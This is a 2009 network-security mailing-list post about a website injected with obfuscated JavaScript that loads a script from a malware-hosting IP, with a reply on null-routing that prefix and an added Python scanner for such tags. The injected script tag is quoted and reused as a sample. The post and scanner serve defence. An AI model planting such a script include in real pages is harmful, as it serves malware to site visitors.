[nsp-sec] ATTN AS 12553 malware hosting
Brian Eckman
eckman at umn.edu
Thu Apr 9 16:40:45 EDT 2009
Mike Tancsa wrote:
> One of our customer Windows-based websites was hacked (still looking for
> the initial vector)... On their html pages, some obfuscated js code was
> installed that translates to
>
> <script src = //94.247.2.195 / jquery.js> </script>
I realize that not everyone can just do this, but we null routed
94.247.2.0/23 at our exit/border routers a few months back. After a
month or so of intel gathering, the only semi-legit services I could
find there were authoritative DNS servers, and all of the zones I saw
queries for were not what I'd call collateral damage, but more like a
bonus for us...
It's announced within 94.247.0.0/21, but I didn't see anything else
within the /21 that seemed related to all of the badness within that /23.
(To the best of my knowledge, the only other blocks we've ever
implemented, outside of /32s, were 85.255.112.0/21 (DNS hijacking), and
AS40989 (RBN). So we don't just drop any old bad guys we come across....)
Brian
--
Brian Eckman, Security Analyst
University of Minnesota
Office of Information Technology
Security & Assurance
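The thread's two operational points, spotting the injected `<script src=//94.247.2.195/jquery.js>` reference in served HTML and matching the host against prefixes that have been null-routed, can be checked with a small scanner. This is an added example and is not code from either poster; the blocked prefixes are the two Brian names (94.247.2.0/23 and 85.255.112.0/21), the `allowed_hosts` list and the sample page are constructed for the example, and 203.0.113.7 is a documentation (TEST-NET-3) address standing in for an arbitrary raw-IP host.

```python
"""Flag <script src=...> tags that load from raw-IP hosts or from prefixes
that have been null-routed.  Added example, not from the nsp-sec post."""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Prefixes the post says were null-routed at the border (plus the /21 from
# the DNS-hijacking incident).  Extend with whatever your own border drops.
BLOCKED_PREFIXES = [
    ipaddress.ip_network("94.247.2.0/23"),
    ipaddress.ip_network("85.255.112.0/21"),
]


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag, including unquoted
    and protocol-relative values such as //94.247.2.195/jquery.js."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value.strip())


def classify(src):
    """Return (kind, host) for a script src.

    kind is one of:
      relative        - same-origin path, no host
      hostname        - a DNS name (check against an allow list)
      raw_ip          - a literal IP not inside any blocked prefix
      blocked_prefix  - a literal IP inside a null-routed prefix
    """
    host = urlsplit(src).hostname  # handles http://, https:// and //host/path
    if host is None:
        return ("relative", None)
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return ("hostname", host)
    if any(ip in net for net in BLOCKED_PREFIXES):
        return ("blocked_prefix", host)
    return ("raw_ip", host)


def find_suspicious_scripts(html, allowed_hosts=()):
    """Return [(src, kind, host)] for every external script that is not a
    known-good hostname.  Relative paths are ignored."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    findings = []
    for src in parser.srcs:
        kind, host = classify(src)
        if kind == "relative":
            continue
        if kind == "hostname" and host in allowed_hosts:
            continue
        findings.append((src, kind, host))
    return findings


# Constructed sample page: one legitimate CDN include, the injected tag from
# the thread (de-spaced), and a second raw-IP include outside any block.
SAMPLE_PAGE = """<html><head>
<script src="/js/site.js"></script>
<script src="https://code.jquery.com/jquery.js"></script>
<script src=//94.247.2.195/jquery.js></script>
<script src="http://203.0.113.7/stats.js"></script>
</head><body>hello</body></html>"""

if __name__ == "__main__":
    for src, kind, host in find_suspicious_scripts(
        SAMPLE_PAGE, allowed_hosts={"code.jquery.com"}
    ):
        print(f"{kind:15} {host:16} {src}")
```

Raw-IP script sources are rare on legitimate sites, so the `raw_ip` class alone is a good trigger for a closer look even before a prefix is on the drop list; `blocked_prefix` hits mean the page was compromised regardless of whether the null route is still masking the fetch from your users. The null route itself, on IOS-style platforms, is the usual static route to Null0 for the /23 (`ip route 94.247.2.0 255.255.254.0 Null0`), which is what Brian describes doing at the border rather than anything this script does.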